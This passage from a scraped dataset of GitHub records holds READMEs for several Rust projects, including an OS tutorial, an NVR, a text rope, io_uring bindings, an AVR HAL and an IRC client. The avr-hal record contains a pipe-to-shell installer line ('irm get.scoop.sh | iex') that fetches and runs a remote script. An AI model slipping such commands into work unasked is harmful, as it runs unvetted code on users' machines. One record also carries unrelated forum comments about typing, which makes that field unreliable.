from K210.\n\n\n## Show runtime debug info of OS kernel version\nThe branch of ch9-log contains a lot of debug info. You could try to run rcore tutorial \nfor understand the internal behavior of os kernel.\n\n```sh\n$ git clone https://github.com/rcore-os/rCore-Tutorial-v3.git\n$ cd rCore-Tutorial-v3/os\n$ git checkout ch9-log\n$ make run\n......\n[rustsbi] RustSBI version 0.2.0-alpha.10, adapting to RISC-V SBI v0.3\n.______ __ __ _______.___________. _______..______ __\n| _ \\ | | | | / | | / || _ \\ | |\n| |_) | | | | | | (----`---| |----`| (----`| |_) || |\n| / | | | | \\ \\ | | \\ \\ | _ < | |\n| |\\ \\----.| `--' |.----) | | | .----) | | |_) || |\n| _| `._____| \\______/ |_______/ |__| |_______/ |______/ |__|\n\n[rustsbi] Implementation: RustSBI-QEMU Version 0.0.2\n[rustsbi-dtb] Hart count: cluster0 with 1 cores\n[rustsbi] misa: RV64ACDFIMSU\n[rustsbi] mideleg: ssoft, stimer, sext (0x222)\n[rustsbi] medeleg: ima, ia, bkpt, la, sa, uecall, ipage, lpage, spage (0xb1ab)\n[rustsbi] pmp0: 0x10000000 ..= 0x10001fff (rw-)\n[rustsbi] pmp1: 0x2000000 ..= 0x200ffff (rw-)\n[rustsbi] pmp2: 0xc000000 ..= 0xc3fffff (rw-)\n[rustsbi] pmp3: 0x80000000 ..= 0x8fffffff (rwx)\n[rustsbi] enter supervisor 0x80200000\n[KERN] rust_main() begin\n[KERN] clear_bss() begin\n[KERN] clear_bss() end\n[KERN] mm::init() begin\n[KERN] mm::init_heap() begin\n[KERN] mm::init_heap() end\n[KERN] mm::init_frame_allocator() begin\n[KERN] mm::frame_allocator::lazy_static!FRAME_ALLOCATOR begin\n......\n```\n\n## Rustdoc\n\nCurrently it can only help you view the code since only a tiny part of the code has been documented.\n\nYou can open a doc html of `os` using `cargo doc --no-deps --open` under `os` directory.\n\n### OS-API-DOCS\nThe API Docs for Ten OS\n1. [Lib-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch1/os/index.html)\n1. [Batch-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch2/os/index.html)\n1. [MultiProg-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch3-coop/os/index.html)\n1. [TimeSharing-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch3/os/index.html)\n1. [AddrSpace-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch4/os/index.html)\n1. [Process-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch5/os/index.html)\n1. [FileSystem-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch6/os/index.html)\n1. [IPC-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch7/os/index.html)\n1. [SyncMutex-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch8/os/index.html)\n1. [IODevice-OS API doc](https://learningos.github.io/rCore-Tutorial-v3/ch9/os/index.html)\n\n## Working in progress\n\nOur first release 3.6.0 (chapter 1-9) has been published, and we are still working on it.\n\n* chapter 9: need more descripts about different I/O devices\n\nHere are the updates since 3.5.0:\n\n### Completed\n\n* [x] automatically clean up and rebuild before running our project on a different platform\n* [x] fix `power` series application in early chapters, now you can find modulus in the output\n* [x] use `UPSafeCell` instead of `RefCell` or `spin::Mutex` in order to access static data structures and adjust its API so that it cannot be borrowed twice at a time(mention `& .exclusive_access().task[0]` in `run_first_task`)\n* [x] move `TaskContext` into `TaskControlBlock` instead of restoring it in place on kernel stack(since ch3), eliminating annoying `task_cx_ptr2`\n* [x] replace `llvm_asm!` with `asm!`\n* [x] expand the fs image size generated by `rcore-fs-fuse` to 128MiB\n* [x] add a new test named `huge_write` which evaluates the fs performance(qemu\\~500KiB/s k210\\~50KiB/s)\n* [x] flush all block cache to disk after a fs transaction which involves write operation\n* [x] replace `spin::Mutex` with `UPSafeCell` before SMP chapter\n* [x] add codes for a new chapter about synchronization & mutual exclusion(uniprocessor only)\n* [x] bug fix: we should call `find_pte` rather than `find_pte_create` in `PageTable::unmap`\n* [x] clarify: \"check validity of level-3 pte in `find_pte` instead of checking it outside this function\" should not be a bug\n* [x] code of chapter 8: synchronization on a uniprocessor\n* [x] switch the code of chapter 6 and chapter 7\n* [x] support signal mechanism in chapter 7/8(only works for apps with a single thread)\n* [x] Add boards/ directory and support rustdoc, for example you can use `cargo doc --no-deps --open` to view the documentation of a crate\n* [x] code of chapter 9: device drivers based on interrupts, including UART, block, keyboard, mouse, gpu devices\n* [x] add CI autotest and doc in github \n### Todo(High priority)\n\n* [ ] review documentation, current progress: 8/9\n* [ ] use old fs image optionally, do not always rebuild the image\n* [ ] shell functionality improvement(to be continued...)\n* [ ] give every non-zero process exit code an unique and clear error type\n* [ ] effective error handling of mm module\n* [ ] add more os functions for understanding os conecpts and principles\n### Todo(Low priority)\n\n* [ ] rewrite practice doc and remove some inproper questions\n* [ ] provide smooth debug experience at a Rust source code level\n* [ ] format the code using official tools\n\n### Crates\n\nWe will add them later.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "scottlamb/moonfire-nvr", "link": "https://github.com/scottlamb/moonfire-nvr", "tags": ["nvr", "ip-camera", "rtsp", "video", "security-camera", "rust", "javascript", "camera"], "stars": 830, "description": "Moonfire NVR, a security camera network video recorder", "lang": "Rust", "repo_lang": "", "readme": "[![CI](https://github.com/scottlamb/moonfire-nvr/workflows/CI/badge.svg)](https://github.com/scottlamb/moonfire-nvr/actions?query=workflow%3ACI)\n\n* [Introduction](#introduction)\n* [Documentation](#documentation)\n\n# Introduction\n\nMoonfire NVR is an open-source security camera network video recorder, started\nby Scott Lamb <>. It saves H.264-over-RTSP streams from\nIP cameras to disk into a hybrid format: video frames in a directory on\nspinning disk, other data in a SQLite3 database on flash. It can construct\n`.mp4` files for arbitrary time ranges on-the-fly. It does not decode,\nanalyze, or re-encode video frames, so it requires little CPU. It handles six\n1080p/30fps streams on a [Raspberry Pi\n2](https://www.raspberrypi.org/products/raspberry-pi-2-model-b/), using\nless than 10% of the machine's total CPU.\n\n**Help wanted to make it great! Please see the [contributing\nguide](CONTRIBUTING.md).**\n\nSo far, the web interface is basic: a filterable list of video segments,\nwith support for trimming them to arbitrary time ranges. No scrub bar yet.\nThere's also an experimental live view UI.\n\n\n \n \n \n \n \n \n
\"list\"live
\n\nThere's no support yet for motion detection, no https/TLS support (you'll\nneed a proxy server, as described [here](guide/secure.md)), and only a\nconsole-based (rather than web-based) configuration UI.\n\nMoonfire NVR is currently at version 0.7.5. Until version 1.0, there will be no\ncompatibility guarantees: configuration and storage formats may change from\nversion to version. There is an [upgrade procedure](guide/schema.md) but it is\nnot for the faint of heart.\n\nI hope to add features such as video analytics. In time, we can build\na full-featured hobbyist-oriented multi-camera NVR that requires nothing but\na cheap machine with a big hard drive. There are many exciting techniques we\ncould use to make this possible:\n\n* avoiding CPU-intensive H.264 encoding in favor of simply continuing to use\n the camera's already-encoded video streams. Cheap IP cameras these days\n provide pre-encoded H.264 streams in both \"main\" (full-sized) and \"sub\"\n (lower resolution, compression quality, and/or frame rate) varieties. The\n \"sub\" stream is more suitable for fast computer vision work as well as\n remote/mobile streaming. Disk space these days is quite cheap (with 4 TB\n drives costing about $100), so we can afford to keep many camera-months\n of both streams on disk.\n* off-loading on-NVR analytics to an inexpensive USB or M.2 neural network\n accelerator and hardware H.264 decoders.\n* taking advantage of on-camera analytics. They're often not as accurate, but\n they're the best way to stretch very inexpensive NVR machines.\n\n# Documentation\n\n* [Contributing](CONTRIBUTING.md)\n* [License](LICENSE.txt) \u2014\n [GPL-3.0-or-later](https://spdx.org/licenses/GPL-3.0-or-later.html)\n with [GPL-3.0-linking-exception](https://spdx.org/licenses/GPL-3.0-linking-exception.html)\n for OpenSSL.\n* [Change log](CHANGELOG.md) / release notes.\n* [Guides](guide/), including:\n * [Installing](guide/install.md)\n * [Building from source](guide/build.md)\n * [Securing Moonfire NVR and exposing it to the Internet](guide/secure.md)\n * [UI Development](guide/developing-ui.md)\n * [Troubleshooting](guide/troubleshooting.md)\n* [References](ref/), including:\n * [Configuration file](ref/config.md)\n * [JSON API](ref/api.md)\n* [Design documents](design/)\n* [Wiki](https://github.com/scottlamb/moonfire-nvr/wiki) has hardware\n recommendations, notes on several camera models, etc. Please add more!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cessen/ropey", "link": "https://github.com/cessen/ropey", "tags": [], "stars": 827, "description": "A utf8 text rope for manipulating and editing large texts.", "lang": "Rust", "repo_lang": "", "readme": "# Ropey\n\n[![CI Build Status][github-ci-img]][github-ci]\n[![Latest Release][crates-io-badge]][crates-io-url]\n[![Documentation][docs-rs-img]][docs-rs-url]\n\nRopey is a utf8 text rope for Rust, designed to be the backing text-buffer for\napplications such as text editors. Ropey is fast, robust, and can handle huge\ntexts and memory-incoherent edits with ease.\n\n\n## Example Usage\n\n```rust\n// Load a text file.\nlet mut text = ropey::Rope::from_reader(\n File::open(\"my_great_book.txt\")?\n)?;\n\n// Print the 516th line (zero-indexed).\nprintln!(\"{}\", text.line(515));\n\n// Get the start/end char indices of the line.\nlet start_idx = text.line_to_char(515);\nlet end_idx = text.line_to_char(516);\n\n// Remove the line...\ntext.remove(start_idx..end_idx);\n\n// ...and replace it with something better.\ntext.insert(start_idx, \"The flowers are... so... dunno.\\n\");\n\n// Print the changes, along with the previous few lines for context.\nlet start_idx = text.line_to_char(511);\nlet end_idx = text.line_to_char(516);\nprintln!(\"{}\", text.slice(start_idx..end_idx));\n\n// Write the file back out to disk.\ntext.write_to(\n BufWriter::new(File::create(\"my_great_book.txt\")?)\n)?;\n```\n\n## When Should I Use Ropey?\n\nRopey is designed and built to be the backing text buffer for applications\nsuch as text editors, and its design trade-offs reflect that. Ropey is good\nat:\n\n- Handling frequent edits to medium-to-large texts. Even on texts that are\n multiple gigabytes large, edits are measured in single-digit microseconds.\n- Handling Unicode correctly. It is impossible to create invalid utf8 through\n Ropey, and all Unicode line endings are correctly tracked including CRLF.\n- Having flat, predictable performance characteristics. Ropey will never be\n the source of hiccups or stutters in your software.\n\nOn the other hand, Ropey is _not_ good at:\n\n- Handling texts smaller than a couple of kilobytes or so. That is to say,\n Ropey will handle them fine, but Ropey allocates space in kilobyte chunks,\n which introduces unnecessary bloat if your texts are almost always small.\n- Handling texts that are larger than available memory. Ropey is an in-memory\n data structure.\n- Getting the best performance for every possible use-case. Ropey puts work\n into tracking both line endings and unicode scalar values, which is\n performance overhead you may not need depending on your use-case.\n\nKeep this in mind when selecting Ropey for your project. Ropey is very good\nat what it does, but like all software it is designed with certain\napplications in mind.\n\n\n## Features\n\n### Strong Unicode support\nRopey's atomic unit of text is\n[Unicode scalar values](https://www.unicode.org/glossary/#unicode_scalar_value)\n(or [`char`](https://doc.rust-lang.org/std/primitive.char.html)s in Rust)\nencoded as utf8. All of Ropey's editing and slicing operations are done\nin terms of char indices, which prevents accidental creation of invalid\nutf8 data.\n\nRopey also supports converting between scalar value indices and utf16 code unit\nindices, for interoperation with external APIs that may still use utf16.\n\n### Line-aware\n\nRopey knows about line breaks, allowing you to index into and iterate over\nlines of text.\n\nThe line breaks Ropey recognizes are also configurable at build time via\nfeature flags. See Ropey's documentation for details.\n\n### Rope slices\n\nRopey has rope slices that allow you to work with just parts of a rope, using\nall the read-only operations of a full rope including iterators and making\nsub-slices.\n\n### Flexible APIs with low-level access\n\nAlthough Ropey is intentionally limited in scope, it also provides APIs for\nefficiently accessing and working with its internal text chunk\nrepresentation, allowing additional functionality to be efficiently\nimplemented by client code with minimal overhead.\n\n### Efficient\n\nRopey is fast and minimizes memory usage:\n\n- On a recent mobile i7 Intel CPU, Ropey performed over 1.8 million small\n incoherent insertions per second while building up a text roughly 100 MB\n large. Coherent insertions (i.e. all near the same place in the text) are\n even faster, doing the same task at over 3.3 million insertions per\n second.\n- Freshly loading a file from disk only incurs about 10% memory overhead. For\n example, a 100 MB text file will occupy about 110 MB of memory when loaded\n by Ropey.\n- Cloning ropes is _extremely_ cheap. Rope clones share data, so an initial\n clone only takes 8 bytes of memory. After that, memory usage will grow\n incrementally as the clones diverge due to edits.\n\n### Thread safe\n\nRopey ensures that even though clones share memory, everything is thread-safe.\nClones can be sent to other threads for both reading and writing.\n\n\n## Unsafe code\n\nRopey uses unsafe code to help achieve some of its space and performance\ncharacteristics. Although effort has been put into keeping the unsafe code\ncompartmentalized and making it correct, please be cautious about using Ropey\nin software that may face adversarial conditions.\n\nAuditing, fuzzing, etc. of the unsafe code in Ropey is extremely welcome.\nIf you find any unsoundness, _please_ file an issue! Also welcome are\nrecommendations for how to remove any of the unsafe code without introducing\nsignificant space or performance regressions, or how to compartmentalize the\nunsafe code even better.\n\n\n## License\n\nRopey is licensed under the MIT license (LICENSE.md or http://opensource.org/licenses/MIT)\n\n\n## Contributing\n\nContributions are absolutely welcome! However, please open an issue or email\nme to discuss larger changes, to avoid doing a lot of work that may get\nrejected.\n\nAn overview of Ropey's design can be found [here](https://github.com/cessen/ropey/blob/master/design/design.md).\n\nUnless you explicitly state otherwise, any contribution intentionally\nsubmitted for inclusion in Ropey by you will be licensed as above, without any additional terms or conditions.\n\n[crates-io-badge]: https://img.shields.io/crates/v/ropey.svg\n[crates-io-url]: https://crates.io/crates/ropey\n[github-ci-img]: https://github.com/cessen/ropey/workflows/ci/badge.svg\n[github-ci]: https://github.com/cessen/ropey/actions?query=workflow%3Aci\n[docs-rs-img]: https://docs.rs/ropey/badge.svg\n[docs-rs-url]: https://docs.rs/ropey\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "spacejam/rio", "link": "https://github.com/spacejam/rio", "tags": ["io-uring", "io", "uring", "rust", "steamy", "linux"], "stars": 827, "description": "pure rust io_uring library, built on libc, thread & async friendly, misuse resistant", "lang": "Rust", "repo_lang": "", "readme": "* [documentation](https://docs.rs/rio)\n* [chat](https://discord.gg/Z6VsXds)\n* [sponsor](https://github.com/sponsors/spacejam)\n\n# rio\n\nbindings for io_uring, the hottest\nthing to happen to linux IO in a long time.\n\n#### Soundness status\n\nrio aims to leverage Rust's compile-time checks to be\nmisuse-resistant compared to io_uring interfaces in\nother languages, but users should beware that\n**use-after-free bugs are still possible without\n`unsafe` when using rio.** `Completion` borrows the\nbuffers involved in a request, and its destructor\nblocks in order to delay the freeing of those buffers\nuntil the corresponding request has completed; but it\nis considered safe in Rust for an object's lifetime\nand borrows to end without its destructor running,\nand this can happen in various ways, including\nthrough `std::mem::forget`. Be careful not to let\ncompletions leak in this way, and if Rust's soundness\nguarantees are important to you, you may want to\navoid this crate.\n\n#### Innovations\n\n* only relies on libc, no need for c/bindgen to\n complicate things, nobody wants that\n* the completions work great with threads or an\n async runtime (`Completion` implements Future)\n* uses Rust marker traits to guarantee that a buffer will never\n be written into unless it is writable memory. (prevents\n you from trying to write data into static read-only memory)\n* no need to mess with `IoSlice` / `libc::iovec` directly.\n rio maintains these in the background for you.\n* If left to its own devices, io_uring will allow you to\n submit more IO operations than would actually fit in\n the completion queue, allowing completions to be dropped\n and causing leaks of any userspace thing waiting for\n the completion. rio exerts backpressure on submitters\n when the number of in-flight requests reaches this\n threshold, to guarantee that no completions will\n be dropped due to completion queue overflow.\n* rio will handle submission queue submissions\n automatically. If you start waiting for a\n `Completion`, rio will make sure that we\n have already submitted at least this request\n to the kernel. Other io_uring libraries force\n you to handle this manually, which is another\n possible source of misuse.\n\nThis is intended to be the core of [sled's](http://sled.rs) writepath.\nIt is built with a specific high-level\napplication in mind: a high performance storage\nengine and replication system.\n\n#### What's io_uring?\n\nio_uring is the biggest thing to happen to the\nlinux kernel in a very long time. It will change\neverything. Anything that uses epoll right now\nwill be rewritten to use io_uring if it wants\nto stay relevant. It started as a way to do real\nasync disk IO without needing to use O_DIRECT, but\nits scope has expanded and it will continue to support\nmore and more kernel functionality over time due to\nits ability to batch large numbers different syscalls.\nIn kernel 5.5 support is added for more networking\noperations like `accept(2)`, `sendmsg(2)`, and `recvmsg(2)`.\nIn 5.6 support is being added for `recv(2)` and `send(2)`.\nio_uring [has been measured to dramatically outperform\nepoll-based networking, with io_uring outperforming\nepoll-based setups more and more under heavier load](https://twitter.com/markpapadakis/status/1216978559601926145).\nI started rio to gain an early deep understanding of this\namazing new interface, so that I could use it ASAP and\nresponsibly with [sled](http://sled.rs).\n\nio_uring unlocks the following kernel features:\n\n* fully-async interface for a growing number of syscalls\n* async disk IO without using O_DIRECT as you have\n to do with AIO\n* batching hundreds of disk and network IO operations\n into a single syscall, which is especially wonderful\n in a post-meltdown/spectre world where our syscalls have\n [dramatically slowed down](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html)\n* 0-syscall IO operation submission, if configured in\n SQPOLL mode\n* configurable completion polling for trading CPU for\n low latency\n* Allows expression of sophisticated 0-copy broadcast\n semantics, similar to splice(2) or sendfile(2) but\n working with many file-like objects without ever\n needing to bounce memory and mappings into userspace\n en-route.\n* Allows IO buffers and file descriptors to be registered\n for cheap reuse (remapping buffers and file descriptors\n for use in the kernel has a significant cost).\n\nTo read more about io_uring, check out:\n\n* [Ringing in a new asynchronous I/O API](https://lwn.net/Articles/776703/)\n* [Efficient IO with io_uring](https://kernel.dk/io_uring.pdf)\n* [What\u2019s new with io_uring](https://kernel.dk/io_uring-whatsnew.pdf)\n* Follow [Jens Axboe on Twitter](https://twitter.com/axboe) to follow dev progress\n\nFor some slides with interesting io_uring performance results,\ncheck out slides 43-53 of [this presentation deck by Jens](https://www.slideshare.net/ennael/kernel-recipes-2019-faster-io-through-iouring).\n\n#### why not use those other Rust io_uring libraries?\n\n* they haven't copied `rio`'s features yet, which you pretty much\n have to use anyway to responsibly use `io_uring` due to the\n sharp edges of the API. All of the libraries I've seen\n as of January 13 2020 are totally easy to overflow the\n completion queue with, as well as easy to express\n use-after-frees with, don't seem to be async-friendly,\n etc...\n\n#### examples that will be broken in the next day or two\n\nasync tcp echo server:\n\n```rust\nuse std::{\n io::self,\n net::{TcpListener, TcpStream},\n};\n\nasync fn proxy(ring: &rio::Rio, a: &TcpStream, b: &TcpStream) -> io::Result<()> {\n let buf = vec![0_u8; 512];\n loop {\n let read_bytes = ring.read_at(a, &buf, 0).await?;\n let buf = &buf[..read_bytes];\n ring.write_at(b, &buf, 0).await?;\n }\n}\n\nfn main() -> io::Result<()> {\n let ring = rio::new()?;\n let acceptor = TcpListener::bind(\"127.0.0.1:6666\")?;\n\n extreme::run(async {\n // kernel 5.5 and later support TCP accept\n loop {\n let stream = ring.accept(&acceptor).await?;\n dbg!(proxy(&ring, &stream, &stream).await);\n }\n })\n}\n```\n\nfile reading:\n\n```rust\nlet ring = rio::new().expect(\"create uring\");\nlet file = std::fs::open(\"file\").expect(\"openat\");\nlet data: &mut [u8] = &mut [0; 66];\nlet completion = ring.read_at(&file, &mut data, at);\n\n// if using threads\ncompletion.wait()?;\n\n// if using async\ncompletion.await?\n```\n\nfile writing:\n\n```rust\nlet ring = rio::new().expect(\"create uring\");\nlet file = std::fs::create(\"file\").expect(\"openat\");\nlet to_write: &[u8] = &[6; 66];\nlet completion = ring.write_at(&file, &to_write, at);\n\n// if using threads\ncompletion.wait()?;\n\n// if using async\ncompletion.await?\n```\n\nspeedy O_DIRECT shi0t (try this at home / run the o_direct example)\n\n```rust\nuse std::{\n fs::OpenOptions, io::Result,\n os::unix::fs::OpenOptionsExt,\n};\n\nconst CHUNK_SIZE: u64 = 4096 * 256;\n\n// `O_DIRECT` requires all reads and writes\n// to be aligned to the block device's block\n// size. 4096 might not be the best, or even\n// a valid one, for yours!\n#[repr(align(4096))]\nstruct Aligned([u8; CHUNK_SIZE as usize]);\n\nfn main() -> Result<()> {\n // start the ring\n let ring = rio::new()?;\n\n // open output file, with `O_DIRECT` set\n let file = OpenOptions::new()\n .read(true)\n .write(true)\n .create(true)\n .truncate(true)\n .custom_flags(libc::O_DIRECT)\n .open(\"file\")?;\n\n let out_buf = Aligned([42; CHUNK_SIZE as usize]);\n let out_slice: &[u8] = &out_buf.0;\n\n let in_buf = Aligned([42; CHUNK_SIZE as usize]);\n let in_slice: &[u8] = &in_buf.0;\n\n let mut completions = vec![];\n\n for i in 0..(10 * 1024) {\n let at = i * CHUNK_SIZE;\n\n // By setting the `Link` order,\n // we specify that the following\n // read should happen after this\n // write.\n let write = ring.write_at_ordered(\n &file,\n &out_slice,\n at,\n rio::Ordering::Link,\n );\n completions.push(write);\n\n let read = ring.read_at(&file, &in_slice, at);\n completions.push(read);\n }\n\n for completion in completions.into_iter() {\n completion.wait()?;\n }\n\n Ok(())\n}\n```\n", "readme_type": "markdown", "hn_comments": "I am a Dvorak touchtypist, this was literally my first skill I developed during my study in university. I can predict that relearning from qwerty to Dvorak or Dvorak for programmers will be very painful for someone in his mid-thirties, but since you are going to train yourself with typing anyway, I recommend you to start from Dvorak and continue with qwerty if the pain will be really unbearable. There is nothing good in qwerty except of super handy placement of Cut, Copy, Past, Save and Select All operations - you know, a lot of people just have no requirements to typing setup other that handy copy-pasting.Also you might consider to start some music playing for developing your fingers. For me playing vertical piano was kind of another step in mastering my keyboard skill because it involves all 10 fingers and vertical piano is significantly harder to press than grand piano or (especially) a synthesizer.Your ring index issue looks very strange for me. I have noticed that nowadays nobody press a door bell button with ring finger anymore, probably because of smartphones.add: If this is not obvious from my comment, I want this to be obvious: download any keyboard training software or use this kind of website. Requirement is an ability to start from 4 letters.I learned to touch type at a young age, using a book my grandmother used to teach herself:https://www.etsy.com/market/gregg_typing_manualPut your hands on asdf and jkl; and just start typing random combinations of those letters without looking until you know what letters/fingers to use. Then you gradually expand, first to g and h, then to nearby letters in the row above and below, then to numbers and symbols.Some other tips:- don't smash the keys; practice using as little force as necessary, because the impact at the bottom of the key travel is going to cause finger strain- use right ring finger for the backspace by twisting your wrist slightly. Don't use pinky because you either have to stretch it or move your arm. I use left ring finger for tab for the same reason, although it's closer and pinky is not horrible- don't worry about keeping all your fingers on the home row when reaching for numbers. It's better to move your hand a bit, for example, to press 1, rather than stretch your fingers. Or you can curl your fingers and move your hand up. If you feel your fingers stretching/straining, it will cause fatigue and/or carpal tunnel.- you just have to commit to spending time to learn to touch type. You can start by using your thumb for the spacebar, not your right index finger!I'm using the HHKB JP layout which is not ortholinear but has a smaller spacebar, therefore more thumb keys available for ctrl, alt, cmd, etc.https://www.pfu.fujitsu.com/direct/hhkb/detail_hhkb-pro-jp.h...I also use a Kinesis at the office, which has better ergonomics but worse portability.https://kinesis-ergo.com/shop/advantage2/I love my dactyl manuform to bits. Is there a more specific question?No offense this is not a technology fix, this is a get some real exercise and be healthier. Do it now before you get older and things get harder to fix using mother nature.Your body was not designed to sit and type for 10 hours even with breaks. You need to move and use your entire body to do something physical.Try weightlifting with a trainer or a trusted friend who knows what they are doing. Go for a hike not a walk or look up fully body calisthenic workouts on youtube. You can do those with no equipment.You could have an Embody chair and a self adjusting perfect desk and keyboard and you will still hurt doing what you are doing. Please take this as a positive nudge towards becoming healthier.Clickable URL: http://www.masswerk.at/spacewar", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Rahix/avr-hal", "link": "https://github.com/Rahix/avr-hal", "tags": ["rust-embedd", "rust", "arduino", "avr", "hal-crates"], "stars": 827, "description": "embedded-hal abstractions for AVR microcontrollers", "lang": "Rust", "repo_lang": "", "readme": "avr-hal ![Continuous Integration](https://github.com/Rahix/avr-hal/workflows/Continuous%20Integration/badge.svg) [![arduino-hal docs](https://img.shields.io/badge/docs-arduino--hal-4d76ae)][arduino-hal docs] [![atmega-hal docs](https://img.shields.io/badge/docs-atmega--hal-4d76ae)][atmega-hal docs] [![attiny-hal docs](https://img.shields.io/badge/docs-attiny--hal-4d76ae)][attiny-hal docs]\n=======\nHardware Abstraction Layer for AVR microcontrollers and common boards (for example Arduino). Based on the [`avr-device`](https://github.com/Rahix/avr-device) crate.\n\n## Quickstart\nYou need a nightly Rust compiler for compiling Rust code for AVR. The correct version will be installed automatically due to the `rust-toolchain.toml` file.\n\nInstall dependencies:\n\n- Ubuntu\n ```bash\n sudo apt install avr-libc gcc-avr pkg-config avrdude libudev-dev build-essential\n ```\n- Macos \n ```bash\n xcode-select --install # if you haven't already done so\n brew tap osx-cross/avr\n brew install avr-gcc avrdude\n ```\n- Windows\n\n Install [Scoop](https://scoop.sh/) using Powershell\n ```PowerShell\n Set-ExecutionPolicy RemoteSigned -Scope CurrentUser # Needed to run a remote script the first time\n irm get.scoop.sh | iex\n ```\n Install avr-gcc and avrdude\n ```\n scoop install avr-gcc\n scoop install avrdude\n ```\n See [Setting up environment](https://github.com/Rahix/avr-hal/wiki/Setting-up-environment) for more information.\n \nNext, install [\"ravedude\"](./ravedude), a tool which seamlessly integrates flashing your board into the usual cargo workflow:\n\n```bash\ncargo +stable install ravedude\n```\n\nGo into `./examples/arduino-uno` (or the directory for whatever board you want), and run the following commands:\n\n```bash\ncd examples/arduino-uno\n\n# Build and run it on a connected board\ncargo run --bin uno-blink\n```\n\n## Starting your own project\nThe best way to start your own project is via the [`avr-hal-template`](https://github.com/Rahix/avr-hal-template) which you can easily use with [`cargo-generate`](https://github.com/cargo-generate/cargo-generate):\n\n```bash\ncargo install cargo-generate\ncargo generate --git https://github.com/Rahix/avr-hal-template.git\n```\n\n## Repository Structure\nThe `avr-hal` repository is a workspace containing all components making up the HAL. Here is an overview:\n\n### `arduino-hal` [![arduino-hal docs](https://img.shields.io/badge/docs-git-4d76ae)][arduino-hal docs]\n`arduino-hal` is the batteries-included HAL for all Arduino & similar boards. This is what you probably want to use for your projects. It is intentionally built to abstract away the differences between boards as much as possible.\n\n### `examples/*`\nThe [examples directory](./examples) contains lots of examples for common hardware. Do note that not all examples were ported to all boards, but there is a good chance that you can still use the code. Currently, the [Arduino Uno](./examples/arduino-uno/) crate contains the most examples.\n\n### `mcu/atmega-hal` [![atmega-hal docs](https://img.shields.io/badge/docs-git-4d76ae)][atmega-hal docs] , `mcu/attiny-hal` [![attiny-hal docs](https://img.shields.io/badge/docs-git-4d76ae)][attiny-hal docs]\nHAL crates for AVR microcontroller families. If you have a custom board, you'll want to work with these crates. Please check their documentation for a list of supported MCUs.\n\n### `avr-hal-generic` [![avr-hal-generic docs](https://img.shields.io/badge/docs-git-4d76ae)][avr-hal-generic docs]\nThis is a generic crate containing most of the HAL implementations in the form of macros which are instanciated in each HAL crate for the specific MCUs. If you intend to write drivers that work with any AVR chip, targeting `avr-hal-generic` is probably the best route.\n\n### `avr-specs/`\nThe `avr-specs/` directory contains rustc target definitions for all supported microcontrollers. You will need these for compiling rust code for AVR. The [`avr-hal-template`](https://github.com/Rahix/avr-hal-template) already includes them for convenience.\n\n### [`ravedude`](./ravedude) [![crates.io page](https://img.shields.io/crates/v/ravedude.svg)](https://crates.io/crates/ravedude)\n`ravedude` is a utility for seamlessly integrating avrdude and a serial console into the cargo workflow. With a bit of configuration (check its [README](./ravedude/README.md)!) you can then upload your code to your board and view its output over the serial console by just using `cargo run` as you would normally.\n\n[avr-hal-generic docs]: https://rahix.github.io/avr-hal/avr_hal_generic/index.html\n[arduino-hal docs]: https://rahix.github.io/avr-hal/arduino_hal/index.html\n[atmega-hal docs]: https://rahix.github.io/avr-hal/atmega_hal/index.html\n[attiny-hal docs]: https://rahix.github.io/avr-hal/attiny_hal/index.html\n\n## Disclaimer\nThis project is not affiliated with either Microchip (former Atmel) nor any of the Vendors that created the boards supported in this repository.\n\n## License\n*avr-hal* is licensed under either of\n\n * Apache License, Version 2.0 ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n * MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n## Contribution\nUnless you explicitly state otherwise, any contribution intentionally submitted for inclusion in the work by you, as defined in the Apache-2.0 license, shall be dual licensed as above, without any additional terms or conditions.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "osa1/tiny", "link": "https://github.com/osa1/tiny", "tags": ["irc-client", "rust", "terminal-app"], "stars": 826, "description": "A terminal IRC client ", "lang": "Rust", "repo_lang": "", "readme": "# tiny - Yet another terminal IRC client\n\ntiny is an IRC client written in Rust.\n\n

\n \n \n \n

\n\n## Features\n\n- Clean UI: consecutive join/part/quit messages are shown in a single line, time\n stamps for a message is omitted if it's the same as the message before.\n (inspired by [irc-core](https://github.com/glguy/irc-core))\n\n- All mentions to the user are collected in a \"mentions\" tab, including server\n and channel information. \"mentions\" tab solves the problem of missing mentions\n to you in channels after hours of inactivity.\n\n- Mentions to the user in a channel is highlighted (the channel tab is also\n highlighted in the tab list)\n\n- Simple config file format for automatically connecting to servers, joining\n channels, registering the nickname etc. See [configuration\n section](#configuration) below.\n\n- Nick tab-completion in channels\n\n- Nicks in channels are colored.\n\n- Disconnect detection and automatic reconnects. You can keep tiny running on\n your laptop and it automatically reconnects after a sleep etc.\n\n- Configurable key bindings inspired by terminal emulators and vim. See [key\n bindings section](#key-bindings) below.\n\n- Configurable colors\n\n- SASL authentication\n\n- Configurable desktop notifications on new messages (opt-in feature behind a\n feature flag, see below)\n\n- znc compatible\n\n- TLS support\n\n## Installation\n\ntiny works on Linux and OSX. Windows users can run it under Windows Subsystem\nfor Linux.\n\nFor pre-built binaries see [releases]. To build from source make sure you have\nRust 1.48 or newer. By default tiny uses [rustls] for TLS support, and desktop\nnotifications are disabled.\n\n[releases]: https://github.com/osa1/tiny/releases\n[rustls]: https://github.com/ctz/rustls\n\n- To use system TLS library 